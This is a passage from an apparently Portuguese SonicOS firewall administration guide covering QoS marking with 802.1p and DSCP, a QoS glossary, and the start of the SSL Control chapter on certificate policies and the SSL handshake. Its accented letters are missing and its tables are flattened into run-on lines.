Voc pode restaurar os mapeamentos padro clicando no boto Redefinir configuraes

QoS.

Gerenciar a Marcao QoS
A Marcao QoS configurada na guia QoS de Regras de acesso, na pgina Firewall >
Regras de acesso da interface de gerenciamento. As marcaes 802.1p e DSCP, conforme
gerenciadas pelas Regras de acesso do SonicOS, fornecem 4 aes: Nenhuma, Preservar,
Explcita e Mapear. A ao padro de DSCP Preservar e a ao padro de 802.1p
Nenhuma.
A tabela a seguir descreve o comportamento de cada ao nos dois mtodos de marcao:
802.1p (CoS de
Ao camada 2) DSCP (camada 3) Notas
Nenhum Quando pacotes que A marca DSCP definida (ou Se a interface de destino desta
a correspondam a essa redefinida) explicitamente como 0. classe de trfego for uma
classe de trfego subinterface VLAN, a parte de
(conforme definido pela 802.1p da marca 802.1q ser
Regra de acesso) so explicitamente definida como 0.
enviados para a Se essa classe de trfego se
interface de egresso, destinar a uma VLAN e estiver
no ser adicionada usando 802.1p para priorizao,
nenhuma marca 802.1p. uma Regra de acesso especfica
usando a ao Preservar,
Explcita ou Mapear deve ser
definida para esta classe de
trfego.
Preserva A marca 802.1p O valor de marca DSCP existente
r existente ser ser preservado.
preservada.
Explcita Pode ser atribudo um Pode ser atribudo um valor de Se a ao de 802.1p ou de DSCP
valor de marca 802.1p marca DSCP explcito (063) a for definida como Explcita
explcito (07) a partir de partir de um menu suspenso que enquanto a outra est definida
um menu suspenso que ser apresentado. como Mapear, a atribuio
ser apresentado. explcita ocorre primeiro e, em
seguida, a outra mapeada de
acordo com essa atribuio.
Mapear A configurao de A configurao de mapeamento Se a opo Mapear estiver
mapeamento definida na definida na pgina definida como a ao em DSCP e
pgina Configuraes Configuraes de firewall > 802.1p, o mapeamento ocorrer
de firewall > Mapeamento QoS ser usada apenas em uma direo: se o
Mapeamento QoS ser para mapear de uma marca 802.1 pacote for de uma VLAN e chegar
usada para mapear de para uma marca DSCP. Ser com uma marca 802.1p, o DSCP
uma marca DSCP para apresentada uma caixa de ser mapeado a partir da marca
uma marca 802.1p. seleo adicional para Permitir 802.1p; se o pacote se destinar a
que a marcao 802.1p uma VLAN, o 802.1p ser
substitua os valores DSCP. A mapeado a partir da marca DSCP.
marcao desta caixa de seleo
declarar o valor de 802.1p
mapeado sobre qualquer valor de
DSCP que poder ter sido definido
pelo cliente. Isso til para
substituir os prprios valores
DSCP CoS de configuraes de
clientes.
Por exemplo, consulte a figura a seguir que fornece uma ao de marca DSCP bidirecional.

O acesso HTTP de um navegador da Web em 192.168.168.100 para o servidor Web em
10.50.165.2 resultar na marcao do pacote (carga) interno e dos pacotes (ESP
encapsulado) externos com um valor DSCP de 8. Quando os pacotes surgem da outra
extremidade do tnel e so entregues ao 10.50.165.2, elas apresentaro uma marca DSCP de
8. Quando 10.50.165.2 envia pacotes de resposta de volta atravs do tnel para
192.168.168.100 (comeando com o primeiro pacote SYN/ACK), a Regra de acesso marcar
os pacotes de resposta entregues a 192.168.168.100 com um valor DSCP de 8.
Esse comportamento se aplica s quatro configuraes de ao de QoS para as marcaes
DSCP e 802.1p.
Uma aplicao prtica para esse comportamento poderia ser a configurao de uma regra de
marcao 802.1p para o trfego destinado zona de VPN. Embora marcas 802.1p no possam
ser enviadas atravs da VPN, os pacotes de resposta que so devolvidos atravs da VPN
podem ser marcados com 802.1p em egresso do tnel. Isso requer que a marcao 802.1p
esteja ativa na interface fsica de egresso e que a [Zona] > Regra de acesso via VPN tenha
uma ao de marcao 802.1p que no seja Nenhuma.
Depois de garantir a compatibilidade de 802.1p com seus dispositivos de rede relevantes e
habilitar a marcao 802.1p em interfaces SonicWALL aplicveis, voc pode iniciar a
configurao de Regras de acesso para gerenciar marcas 802.1p.
Fazendo referncia figura a seguir, a rede Site 1 remoto poderia ter duas Regras de acesso
configuradas da seguinte forma:
Configurao Regra de acesso 1 Regra de acesso 2
Guia Geral
Ao Permitir Permitir
Da zona LAN VPN
Para a zona VPN LAN
Servio VOIP VOIP
Origem Sub-rede primria de Sub-redes do site
LAN principal
Destino Sub-redes do site Sub-rede primria de
principal LAN
Usurios permitidos Tudo Tudo
Cronograma Sempre ativo Sempre ativo
Habilitar registro em log Habilitado Habilitado
Permitir pacotes fragmentados Habilitado Habilitado
Guia QoS
Ao de marcao DSCP Mapear Mapear
Permitir que a marcao 802.1p Habilitado Habilitado
substitua os valores DSCP
Ao de marcao 802.1p Mapear Mapear
A primeira Regra de acesso (que rege LAN>VPN) teria os seguintes efeitos:

O trfego de VoIP (conforme definido pelo Grupo de servios) da Sub-rede primria de
LAN destinado a ser enviado atravs da VPN para as Sub-redes do Site principal seria
avaliado para as marcas DSCP e 802.1p.

A combinao da configurao das aes de marcao DSCP e 802.1p para Mapear
descrita na tabela anterior em Gerenciar a Marcao QoS na pgina 736.
O trfego enviado que contm somente uma marca 802.1p (por exemplo, CoS = 6)
teria o pacote (carga) interno associado VPN marcado com DSCP com um valor de
48. O pacote (ESP) externo tambm seria marcado com um valor de 48.
Supondo que o trfego de retorno foi marcado com DSCP (CoS = 48) pelo firewall no
Site principal, o trfego de retorno ser marcado com 802.1p, com CoS = 6 no egresso.
O trfego enviado que contm somente uma marca DSCP (por exemplo, CoS = 48)
teria o valor DSCP preservado nos pacotes interno e externo.
Supondo que o trfego de retorno foi marcado com DSCP (CoS = 48) pelo firewall no
Site principal, o trfego de retorno ser marcado com 802.1p, com CoS = 6 no egresso.
O trfego enviado que contm somente uma marca 802.1p (por exemplo, CoS = 6) e
uma marca DSCP (por exemplo, CoS = 63) daria precedncia marca 802.1p e seria
mapeado em conformidade. O pacote (carga) interno associado VPN seria marcado
com DSCP com um valor de 48. O pacote (ESP) externo tambm seria marcado com
um valor de 48.
Supondo que o trfego de retorno foi marcado com DSCP (CoS = 48) pelo firewall no Site
principal, o trfego de retorno ser marcado com 802.1p, com CoS = 6 no egresso.
Para examinar os efeitos da segunda Regra de acesso (VPN>LAN), vamos examinar as
Regras de acesso configuradas no Site principal.
Configurao Regra de acesso 1 Regra de acesso 2
Guia Geral
Ao Permitir Permitir
Da zona LAN VPN
Para a zona VPN LAN
Servio VOIP VOIP
Origem Sub-redes da LAN Sub-redes do Site remoto 1
Destino Sub-redes do Site remoto 1 Sub-redes da LAN
Usurios permitidos Tudo Tudo
Cronograma Sempre ativo Sempre ativo
Habilitar registro em log Habilitado Habilitado
Permitir pacotes fragmentados Habilitado Habilitado
Guia QoS
Ao de marcao DSCP Mapear Mapear
Permitir que a marcao 802.1p Habilitado Habilitado
substitua os valores DSCP
Ao de marcao 802.1p Mapear Mapear
O trfego de VoIP (conforme definido pelo Grupo de servios) que chega das Sub-redes do
Site 1 remoto atravs da VPN destinado s Sub-redes da LAN na zona de LAN no Site
principal alcanaria a Regra de acesso para chamadas VoIP de entrada. O trfego que chega
zona de VPN no ter qualquer marca 802.1p, apenas marcas DSCP.

O trfego que sai do tnel e que contm uma marca DSCP (por exemplo, CoS = 48)
teria o valor DSCP preservado. Antes de o pacote ser fornecido para o destino na LAN,
ele tambm ser marcado com 802.1p de acordo com as configuraes do
Mapeamento QoS (por exemplo, CoS = 6) pelo firewall no Site principal.
Supondo que o trfego retornado foi marcado com 802.1p (por exemplo, CoS = 6) pelo
telefone VoIP recebendo a chamada no Site principal, o trfego de retorno ser
marcado de acordo com o mapa de converso DSCP (CoS = 48) nos pacotes interno
e externo enviados de volta atravs da VPN.
Supondo que o trfego retornado foi marcado com DSCP (por exemplo, CoS = 48) pelo
telefone VoIP recebendo a chamada no Site principal, o trfego de retorno ter a marca
DSCP preservada nos pacotes interno e externo enviados de volta atravs da VPN.
Supondo que o trfego de retorno foi marcado com 802.1p (por exemplo, CoS = 6) e
com DSCP (por exemplo, CoS = 14) pelo telefone VoIP recebendo a chamada no Site
principal, o trfego de retorno ser marcado com DSCP de acordo com o mapa de
converso (CoS = 48) nos pacotes interno e externo enviados de volta atravs da VPN.

Para obter informaes sobre o Gerenciamento de Largura de Banda (BWM), consulte
Glossrio
802.1p IEEE 802.1p um mecanismo classe de servio de camada 2 (camada MAC) que
marca pacotes usando 3 bits de prioridade (de um total de 8 nveis de prioridade) dentro
de 16 bits adicionais de um cabealho 802.1q. O processamento de 802.1p requer
equipamento compatvel para gerao, reconhecimento e processamento de marcas e s
deve ser usado em redes compatveis.
Gerenciamento de largura de banda (BWM) refere-se a qualquer um dos vrios
algoritmos ou mtodos usados para formatar ou controlar o trfego. A formatao refere-
se geralmente ao gerenciamento de trfego de sada, enquanto o controle refere-se
geralmente ao gerenciamento de trfego de entrada (tambm conhecido como controle de
admisso). Existem vrios mtodos diferentes de gerenciamento de largura de banda,
incluindo vrias tcnicas de enfileiramento e descarte, cada uma com seus prprios pontos
fortes de design. A SonicWALL utiliza um mtodo de enfileiramento baseado em classe e
em token para BWM de entrada e de sada, bem como um mecanismo de descarte para
determinados tipos de trfego de entrada.
Classe de Servio (CoS) um designador ou identificador, como uma marca de camada
2 ou camada 3, que aplicado ao trfego aps a classificao. As informaes de CoS
sero usadas pelo sistema de Qualidade de Servio (QoS) para diferenciar entre as
classes de trfego na rede e fornecer um tratamento especial (por exemplo, enfileiramento
priorizado, baixa latncia, etc.), como definido pelo administrador do sistema de QoS.
Classificao o ato de identificar (ou diferenciar) determinados tipos (ou classes) de
trfego. No contexto de QoS, isso feito para fornecer manipulao personalizada,
priorizao ou eliminao de priorizao tpica, com base na sensibilidade do trfego ao
atraso, latncia ou perda de pacotes. A classificao no SonicOS usa Regras de
acesso e pode ocorrer com base em qualquer um ou em todos os seguintes elementos:
zona de origem, zona de destino, objeto de endereo de origem, objeto de endereo de
destino, objeto de servio, objeto de programao.

Ponto de cdigo um valor que marcado na parte DSCP de um pacote IP por um host
ou um dispositivo de rede intermedirio. Existem atualmente 64 pontos de cdigo
disponveis, de 0 a 63, usados para definir a classe priorizada crescente do trfego
marcado.
Condicionamento um termo amplo usado para descrever uma pluralidade de mtodos
de fornecimento de Qualidade de Servio para o trfego de rede, incluindo, mas no se
limitando a, descarte, enfileiramento, polticas e formatao.
DiffServ servios diferenciados. Um padro de diferenciao entre diferentes tipos ou
classes de trfego em uma rede IP com o objetivo de fornecer tratamento personalizado
para o trfego com base em seus requisitos. DiffServ depende principalmente de valores
de ponto de cdigo marcados no cabealho de ToS de um pacote IP para diferenciar entre
diferentes classes de trfego. Os nveis de servio DiffServ so executados em uma base
por salto em cada roteador (ou outro dispositivo de rede habilitado por DiffServ) atravs do
qual passa o trfego marcado. Os nveis de servio DiffServ atualmente incluem, no
mnimo, Padro, Encaminhamento garantido, Encaminhamento rpido e DiffServ.
Para obter mais informaes, consulte Marcao DSCP na pgina 733.
Descartando um mecanismo de impedimento de congestionamento usado por sistemas
de QoS em uma tentativa de prever quando pode ocorrer congestionamento em uma rede
e impedir o congestionamento descartando o trfego acima do limite. O descarte pode
tambm ser considerado como um algoritmo de gerenciamento de fila, pois ele tenta evitar
situaes de filas completas. Os mecanismos de descarte avanado obedecero a
marcaes de CoS para evitar descartar trfego confidencial. Os mtodos comuns so:
Tail Drop um mtodo indiscriminado de tratamento de uma fila completa em que os
ltimos pacotes na fila so descartados, independentemente da marcao CoS.
Deteco antecipada aleatria (RED) a RED monitora o status de filas para tentar
prever quando uma fila est prestes a ficar cheia. Em seguida, ela descarta
aleatoriamente pacotes de forma escalonada para ajudar a minimizar o potencial de
Sincronizao Global. As implementaes bsicas da RED, como Tail Drop, no
consideram marcaes CoS.
Deteco antecipada aleatria ponderada (WRED) uma implementao da RED
que origina marcaes DSCP em seu processo de deciso de descarte.
DSCP (Ponto de cdigo de servios diferenciados) a redefinio do campo ToS de um
cabealho IP, conforme descrito por RFC2747. O DSCP usa 64 valores de ponto de cdigo
para habilitar DiffServ (servios diferenciados). Marcando o trfego de acordo com sua
classe, cada pacote pode ser tratado adequadamente a cada salto ao longo da rede.
Sincronizao global um efeito colateral potencial de descarte, o mtodo de
impedimento de congestionamento projetado para lidar com filas completas. A
Sincronizao global ocorre quando vrios fluxos de TCP atravs de um link
congestionado so descartados ao mesmo tempo (como pode ocorrer em Tail Drop).
Quando o mecanismo de partida lenta de TCP nativo comea com quase simultaneidade
para cada um desses fluxos, os fluxos inundaro novamente o link. Isso leva a ondas
cclicas de congestionamento e utilizao insuficiente.
Largura de banda garantida uma porcentagem declarada do total de largura de banda
disponvel em uma interface que sempre ser concedida a uma determinada classe de
trfego. Aplicvel a BWM de entrada e de sada. A largura de banda total garantida em
todas as regras de BWM no pode exceder 100% do total de largura de banda disponvel.
O SonicOS melhora o recurso de gerenciamento de largura de banda para fornecer
funcionalidade de limitao de taxa. Agora voc pode criar polticas de trfego que
especificam taxas mximas para trfego de rede de camada 2, 3 ou 4. Isso permite o
gerenciamento de largura de banda em casos em que o link de WAN primrio falhe para
uma conexo secundria que no pode gerenciar tanta quantidade de trfego. A largura
de banda garantida tambm pode ser definida para 0%.

Entrada (ingresso ou IBWM) a capacidade para formatar a taxa qual o trfego entra
em uma determinada interface. Para trfego de TCP, a formatao atual pode ocorrer
quando a taxa de fluxo de ingresso pode ser ajustada atravs de adiamento de
confirmaes de egresso (ACKs), fazendo com que o remetente diminua sua taxa. Para
trfego de UDP, usado um mecanismo de descarte, uma vez que o UDP no tem
controles de feedback nativos.
IntServ Servios integrados, conforme definido pelo RFC1633. Um sistema CoS
alternativo a DiffServ, os IntServ diferem fundamentalmente de DiffServ no fato de cada
dispositivo solicitar (ou reservar) seus requisitos de rede antes de enviar o trfego. Isso
requer que cada salto na rede reconhea os IntServ e tambm requer que cada salto
mantenha informaes de estado para cada fluxo. Os IntServ no so suportados pelo
SonicOS. A implementao mais comum de IntServ RSVP.
Largura de banda mxima uma porcentagem declarada do total de largura de banda
disponvel em uma interface que define a largura de banda mxima que ser permitida a
uma determinada classe de trfego. Aplicvel a BWM de entrada e de sada. Usar como
mecanismo de estrangulamento para especificar um limite de taxa de largura de banda. O
recurso de gerenciamento de largura de banda foi aprimorado para fornecer a
funcionalidade de limitao de taxa. Agora voc pode criar polticas de trfego que
especificam taxas mximas para trfego de rede de camada 2, 3 ou 4. Isso permite o
gerenciamento de largura de banda em casos em que o link de WAN primrio falhe para
uma conexo secundria que no pode gerenciar tanto trfego. A largura de banda
mxima pode ser definida para 0% que impedir todo o trfego.
Sada (egresso ou OBWM) condicionar a taxa qual o trfego enviado para uma
interface. O BWM de sada usa um sistema de enfileiramento baseado em crdito (ou
token) com 8 anis de prioridade para servir diferentes tipos de trfego, como classificado
pelas regras de acesso.
Prioridade uma dimenso adicional usada na classificao de trfego. O SonicOS usa
8 anis de prioridade (0 = mais alta, 7 = mais baixa) que compem a estrutura de fila usada
para BWM. As filas recebem manuteno por ordem do anel de prioridade.
Mapeamento mapeamento, com relao implementao de QoS do SonicOS, a
prtica de converso de marcas CoS de camada 2 (802.1p) em marcas CoS de camada 3
(DSCP) e vice-versa, com a finalidade de preservar as marcas 802.1p em links de rede que
no suportam a marcao 802.1p. A correspondncia de mapa totalmente definvel pelo
usurio e o ato de mapeamento controlado por Regras de acesso.
Marcao tambm conhecida como colorao, o ato de aplicao de informaes de
camada 2 (802.1p) ou de camada 3 (DSCP) em um pacote com o objetivo de diferenciao,
para que ele possa ser classificado (reconhecido) corretamente e priorizado por
dispositivos de rede ao longo do caminho at seu destino.
MPLS Multi Protocol Label Switching (Comutao de rtulos multiprotocolo). Um termo
que surge frequentemente na rea de QoS, mas que no nativamente suportado pela
maioria dos dispositivos de rede IP nas instalaes de clientes, incluindo dispositivos
SonicWALL. MPLS um servio de rede de classe de operadora que tenta aprimorar a
experincia de rede IP adicionando o conceito de caminhos orientados por conexo
(caminhos de comutao de rtulos LSPs) na rede. Quando um pacote deixa uma rede
de instalaes de clientes, ele marcado por um Roteador de borda de rtulo (LER) para
que o rtulo possa ser usado para determinar o LSP. A prpria marca MPLS reside entre
a camada 2 e a camada 3, comunicando mediante caractersticas MPLS de ambas as
camadas de rede. A MPLS est se tornando muito popular para VPNs, oferecendo servios
VPN de camada 2 e camada 3, mas permanece interopervel com implementao VPN
IPsec existente. A MPLS tambm muito bem conhecida por seus recursos de QoS e
interopera bem com marcao DSCP convencional.

Comportamento por salto (PHB) o tratamento que ser aplicado a um pacote por cada
roteador compatvel com DiffServ que atravessa, com base na classificao DSCP do
pacote. O comportamento pode estar entre aes como descarte, nova marcao (nova
classificao), melhor esforo, encaminhamento garantido ou encaminhamento rpido.
Polticas um recurso de condicionamento de trfego que tenta controlar a taxa de trfego
que entra ou sai de um link de rede. Os mtodos de polticas variam de descarte
indiscriminado de navegao a formatao de algoritmos, para vrias disciplinas de
enfileiramento.
Enfileiramento para usar efetivamente a largura de banda disponvel de um link, as filas
so normalmente usadas para classificar e gerenciar separadamente trfego depois de ele
ser classificado. As filas so ento gerenciadas usando uma variedade de mtodos e
algoritmos para garantir que as filas de prioridade mais alta sempre tenham espao para
receber mais trfego e que elas possam receber manuteno (desenfileiradas ou
processadas) antes de reduzir as filas de prioridade. Algumas disciplinas de fila comuns
incluem:
FIFO First In First Out (Primeiro a entrar, primeiro a sair). Uma fila muito simples, no
discriminatria em que o primeiro pacote a entrar o primeiro pacote a ser processado.
Enfileiramento baseado em classe (CBQ) uma disciplina de enfileiramento que
leva em conta o CoS de um pacote, garantindo que o trfego de prioridade mais alta
tratado com preferncia.
Enfileiramento razovel ponderado (WFQ) uma disciplina que tenta atender filas
usando uma frmula simples com base na precedncia de IP dos pacotes e no nmero
total de fluxos. O WFQ tem tendncia para se tornar desequilibrado quando h um
grande nmero desproporcional de fluxos de alta prioridade para ser atendido, muitas
vezes tendo o oposto do efeito desejado.
CBQ baseado em token um aprimoramento ao CBQ que utiliza um token ou um
sistema baseado em crdito que ajuda a suavizar ou normalizar a utilizao do link,
evitando estouro, bem como uso insuficiente. Usado pelo BWM do SonicOS.
RSVP Resource Reservation Protocol (Protocolo de reserva de recursos). Um protocolo
de sinalizao de IntServ usado por alguns aplicativos em que a necessidade prevista de
comportamento de rede (por exemplo, largura de banda e atraso) solicitada para que
possa ser reservada ao longo do caminho de rede. A configurao deste caminho de
reserva requer que cada salto ao longo do processo suporte RSVP e que cada um
concorde em reservar os recursos solicitados. Este sistema de QoS comparativamente
intensivo em termos de recursos, uma vez que requer que cada salto mantenha o estado
em fluxos existentes. Apesar de o RSVP do IntServ ser bem diferente do DSCP de DiffServ,
os dois podem interagir. O RSVP no suportado pelo SonicOS.
Formatao uma tentativa por um sistema de QoS para modificar a taxa de fluxo de
trfego, usando geralmente algum mecanismo de feedback para o remetente. O exemplo
mais comum a manipulao da taxa de TCP, em que as confirmaes (ACKs) enviadas
de volta para um remetente TCP so enfileiradas e atrasadas para aumentar o tempo de
viagem de ida e volta (RTT) calculado, aproveitando o comportamento inerente de TCP
para forar o remetente a reduzir a taxa a que ele envia dados.
Tipo de Servio (ToS) um campo dentro do cabealho IP no qual podem ser
especificadas informaes de CoS. Historicamente usado, embora raramente, em
conjunto com bits de precedncia de IP para definir CoS. O campo ToS agora geralmente
usado por valores de ponto de cdigo de DiffServ.

Captulo 48
Configurar o Controle SSL
Configuraes de firewall > Controle SSL

Esta seo descreve como planejar, criar, implementar e realizar a manuteno do recurso de
Controle de SSL. Esta seo contm as seguintes subsees:
Viso geral do Controle SSL na pgina 743
Configurao de Controle SSL na pgina 751
Habilitar o Controle de SSL em zonas na pgina 753
Eventos do Controle SSL na pgina 754
Viso geral do Controle SSL

Esta seo fornece uma viso geral do Controle SSL. Ela contm as subsees seguintes:
Recursos principais do Controle SSL na pgina 745
Conceitos principais do Controle SSL na pgina 746
Advertncias e avisos na pgina 750
O SonicOS inclui Controle SSL, um sistema para fornecer visibilidade sobre o handshake de
sesses SSL e um mtodo para a criao de polticas para controlar o estabelecimento de
conexes SSL. A SSL (Secure Sockets Layer) o padro dominante da criptografia de TCP
com base em comunicaes de rede, sendo o seu aplicativo mais comum e bem conhecido
Configurar o Controle SSL | 743

HTTPS (HTTP sobre SSL). A SSL fornece identificao de ponto terminal com base em
certificado digital e confidencialidade criptogrfica com base em resumo para comunicaes
de rede.
HTTPS Server
Client
1 Client browses to http://www.mysonicwall.com
2 DNS resolves target to 64.41.140.173
3 Client Sends TCP SYN to 64.41.140.173 port 443.
Sever continues TCP setup with SYN/ACK 4

5 Client Sends ACK
6 Client Sends SSL Client Hello
Server Sends Server Hello 7
Server Sends ServerKeyExchange (Certificate) 8
Server Sends Server Hello Done 9

10 Client Sends ClientKeyExchange
11 Client Sends ChangeCipherSpec
12 Client Sends Encrypted Handshake message (Finished)
Server Sends ChangeCipherSpec 13
Server Sends Encrypted Handshake message (Finished) 14

15 Client Sends GET Request to www.mysonicwall.com (encrypted)
Server responds through SSL channel with data (encrypted). 16
Um efeito da segurana fornecida pela SSL o obscurecimento de toda a carga, incluindo o

URL (Localizador uniforme de recursos, por exemplo, https://www.mysonicwall.com) que est
sendo solicitado por um cliente ao estabelecer uma sesso HTTPS. Isso se deve ao fato de o
HTTP ser transportado dentro do tnel SSL criptografado ao usar HTTPS. O recurso de destino
real (www.mysonicwall.com) s solicitado pelo cliente depois de a sesso SSL ser
estabelecida (etapa 14, figura 1), mas uma vez estabelecida a sesso SSL, no possvel
nenhuma inspeo dos dados da sesso pelo firewall ou qualquer outro dispositivo
intermedirio. Como resultado, sistemas de filtragem de contedo baseados em URL no
podem considerar a solicitao para determinar permissibilidade de nenhuma outra forma que
por endereo IP.
Enquanto a filtragem baseada em endereo IP no funciona bem para HTTP no criptografado
devido eficincia e popularidade da hospedagem virtual baseada em cabealho de host
(definido nos Conceitos principais abaixo), a filtragem de IP pode funcionar com eficcia para
HTTPS devido raridade de sites HTTPS baseados em cabealho de host. Mas essa
confiana depende da integridade do operador de servidor HTTPS e assume que a SSL no
est sendo usada para fins fraudulentos.
Na maioria das vezes, a SSL empregada legitimamente, sendo usada para proteger
comunicaes confidenciais, como compras ou transaes bancrias on-line ou qualquer
sesso onde exista uma troca de informaes pessoais ou importantes. Porm, o custo e a
complexidade cada vez menores de SSL tm tambm incentivado o crescimento de aplicativos
mais duvidosos de SSL, projetados essencialmente para fins de ofuscao ou ocultao, em
vez de segurana.

Uma camuflagem cada vez mais comum a utilizao de servidores proxy baseados na Web
criptografados por SSL com o objetivo de ocultar detalhes de navegao e ignorar filtros de
contedo. Enquanto simples para bloquear servios de proxy HTTPS bem conhecidos desse
tipo atravs de seu endereo IP, praticamente impossvel bloquear milhares de servidores
proxy hospedados privadamente que esto disponveis de imediato por meio de uma simples
pesquisa na Web. O desafio no o nmero cada vez maior de tais servios, mas sim a sua
natureza imprevisvel. Uma vez que esses servios so frequentemente hospedados em redes
domsticas atravs de conexes de modem por cabo e DSL dinamicamente endereada, os
destinos esto em constante movimento. A tentativa de bloqueio de um destino SSL
desconhecido exigiria o bloqueio de todo o trfego SSL, o que praticamente impraticvel.
O Controle SSL fornece vrios mtodos para enfrentar esse desafio disponibilizando ao
administrador de segurana a capacidade de examinar e aplicar controles com base em
polticas para o estabelecimento da sesso SSL. Enquanto a implementao atual no
decodificar os dados do aplicativo SSL, no permitida a identificao baseada no gateway e
a recusa de trfego SSL suspeito.
Recursos principais do Controle SSL
Recurso Benefcio
Listas brancas e negras O administrador pode definir listas de nomes comuns de entidades de
baseadas em nome comum certificados explicitamente permitidos ou negados (descritos nos Conceitos
principais). As entradas sero combinadas em subsequncias, por exemplo,
uma entrada na lista negra de "prox" corresponder a
"www.megaproxy.com", "www.proxify.com" e "proxify.net". Isso permite que o
administrador bloqueie facilmente todas as trocas SSL empregando
certificados emitidos para entidades com nomes potencialmente
censurveis. Inversamente, o administrador pode autorizar facilmente todos
os certificados dentro de uma organizao colocando em lista branca uma
subsequncia comum da organizao. Cada lista pode conter at 1024
entradas.
Como a avaliao realizada no nome comum da entidade incorporado no
certificado, mesmo que o cliente tente ocultar o acesso a esses sites usando
um nome de host alternativo ou at mesmo um endereo IP, a entidade
sempre ser detectada no certificado e a poltica ser aplicada.
Controle do certificado prtica comum para sites legtimos protegidos por SSL usar certificados
autoassinado emitidos por autoridades de certificado bem conhecidas, pois essa a base
de confiana em SSL. quase igualmente comum para os dispositivos de
rede protegidos por SSL (como dispositivos de segurana de rede Dell
SonicWALL) usar certificados autoassinados para seu mtodo padro de
segurana. Por isso, enquanto certificados autoassinados em ambientes
fechados no so suspeitos, suspeito o uso de certificados autoassinados
por sites pblica ou comercialmente disponveis. Um site pblico usando um
certificado autoassinado muitas vezes uma indicao de que a SSL est
sendo usada estritamente para criptografia e no para identificao e
confiana. Embora no incriminando de forma absoluta, isso por vezes
sugere que a ocultao o objetivo, como geralmente o caso de sites
proxy criptografados por SSL.
A capacidade de definir uma poltica para bloquear os certificados
autoassinados permite que os administradores de segurana se protejam
contra essa possvel exposio. Para evitar descontinuidade de
comunicaes para sites SSL conhecidos/confiveis usando certificados
autoassinados, pode ser usado o recurso de lista branca para permisso
explcita.

Recurso Benefcio
Controle de autoridade de Tal como no uso de certificados autoassinados, encontrar um certificado
certificao no confivel emitido por uma autoridade de certificao no confivel no uma
indicao absoluta de obscurecimento desonesto, mas sugere confiana
questionvel.
O Controle SSL pode comparar o emissor do certificado em trocas SSL com
os certificados no repositrio de certificados do firewall. O repositrio de
certificados contm aproximadamente 100 certificados conhecidos da
autoridade de certificao, exatamente como os navegadores da Web dos
dias de hoje. Se o Controle SSL encontrar um certificado emitido por uma
autoridade de certificao que no se encontra no seu repositrio de
certificados, ele pode no permitir a conexo SSL.
Para as organizaes que usam suas prprias autoridades de certificao
privadas, o certificado de CA privado pode facilmente ser importado para o
repositrio de certificados do firewall para reconhecer a autoridade de
certificao privada como confivel. O repositrio pode conter at 256
certificados.
Verso SSL, Nvel de O Controle SSL fornece gerenciamento adicional de sesses SSL com base
codificao e Controle de nas caractersticas da negociao, incluindo a capacidade de no permitir
validade de certificados SSLv2 potencialmente explorveis, a capacidade de no permitir criptografia
fraca (codificaes inferiores a 64 bits) e a capacidade de no permitir
negociaes de SSL quando intervalos de datas de um certificado so
invlidos. Isso permite que o administrador crie um ambiente rigidamente
seguro para usurios da rede, eliminando a exposio a riscos atravs de
fraquezas criptogrficas no vistas ou atravs de desconsiderao ou
entendimento incorreto de avisos de segurana.
Aplicativo com base em zona O Controle SSL aplicado no nvel de zona, permitindo que o administrador
imponha polticas SSL na rede. Quando o Controle SSL est habilitado na
zona, o firewall procura saudaes de cliente enviadas por clientes nessa
zona atravs do firewall que acionar a inspeo. O firewall procura, em
seguida, a saudao do servidor e o certificado que enviado em resposta
para avaliao comparativamente poltica configurada. A habilitao do
Controle SSL na zona de LAN, por exemplo, inspecionar todo o trfego
SSL iniciado por clientes na LAN para qualquer zona de destino.
Aes configurveis e Quando o Controle SSL detecta uma violao de poltica, ele pode registrar
notificaes de eventos o evento e bloquear a conexo ou pode simplesmente registrar o evento,
permitindo em simultneo a continuao da conexo.
Conceitos principais do Controle SSL

SSL Secure Sockets Layer (SSL) um mecanismo de segurana de rede introduzido
pela Netscape em 1995. A SSL foi criada "para fornecer privacidade entre dois aplicativos
de comunicao (um cliente e um servidor) e tambm para autenticar o servidor e,
opcionalmente, o cliente". O aplicativo mais popular da SSL HTTPS, designado por um
URL iniciado com https:// em vez de simplesmente http://, e ele reconhecido como o
mtodo padro de criptografia de trfego da Web na Internet. Uma transferncia de HTTP
SSL geralmente usa a porta TCP 443, enquanto uma transferncia HTTP regular usa a
porta TCP 80. Embora a SSL seja mais conhecida por HTTPS, ela no est limitada a
proteo de HTTP, mas tambm pode ser usada para proteger outros protocolos TCP,

como SMTP, POP3, IMAP e LDAP. Para obter mais informaes, consulte
http://wp.netscape.com/eng/security/SSL_2.html. O estabelecimento da sesso SSL
ocorre da seguinte forma:
SSLv2 a verso mais antiga da SSL, ainda comumente usada. Detectou-se que a SSLv2
tem vrias fraquezas, limitaes e deficincias tericas (comparativamente indicadas na
entrada SSLv3) e vista com desprezo, desdm e indignao por puristas de segurana.
SSLv3 a SSLv3 foi projetada para manter a compatibilidade com a SSLv2, adicionando
os seguintes aprimoramentos:
Mtodos alternativos de troca de chaves, incluindo Diffie-Hellman.
Suporte para token de hardware para troca de chaves e criptografia em massa.
Suporte SHA, DSS e Fortezza.
Transferncia de dados de fora de banda.

TLS Transport Layer Security (Segurana de camada de transporte) (verso 1.0),
tambm conhecida como SSLv3.1, muito semelhante a SSLv3, mas melhor do que
a SSLv3 no seguinte:
SSL TLS
Usa um algoritmo HMAC preliminar Usa HMAC conforme descrito em RFC 2104
No aplica MAC nas informaes de verso Aplica MAC nas informaes de verso
No especifica um valor de preenchimento Inicializa o preenchimento para um valor especfico
Conjunto limitado de alertas e avisos Mensagens de alerta e aviso detalhadas
MAC um MAC (Message Authentication Code Cdigo de autenticao de mensagem)

calculado aplicando um algoritmo (como MD5 ou SHA1) aos dados. O MAC um resumo
da mensagem ou um cdigo de hash unidirecional que muito fcil de calcular, mas que
praticamente irreversvel. Por outras palavras, apenas com o MAC seria praticamente
impossvel determinar a mensagem na qual o resumo se baseou. igualmente difcil
encontrar duas mensagens diferentes que possam resultar no mesmo MAC. Se clculo de
MAC do receptor corresponder clculo de MAC do remetente em uma determinada parte
dos dados, o receptor tem a garantia de que os dados no foram alterados no trnsito.
Saudao de cliente a primeira mensagem enviada pelo cliente para o servidor aps o
estabelecimento da sesso TCP. Esta mensagem inicia a sesso SSL e consiste nos
seguintes componentes:
Verso a verso da SLL que o cliente deseja usar em comunicaes. Esta
geralmente a verso mais recente da SSL suportada pelo cliente.
Aleatrio um carimbo de data/hora de 32 bits juntamente com uma estrutura
aleatria de 28 bytes.
ID da sesso este pode estar vazio se no existir nenhum dado de ID de sesso
(essencialmente solicitando uma nova sesso) ou pode fazer referncia a um ID de
sesso emitido anteriormente.
Conjunto de codificaes uma lista dos algoritmos criptogrficos, por ordem
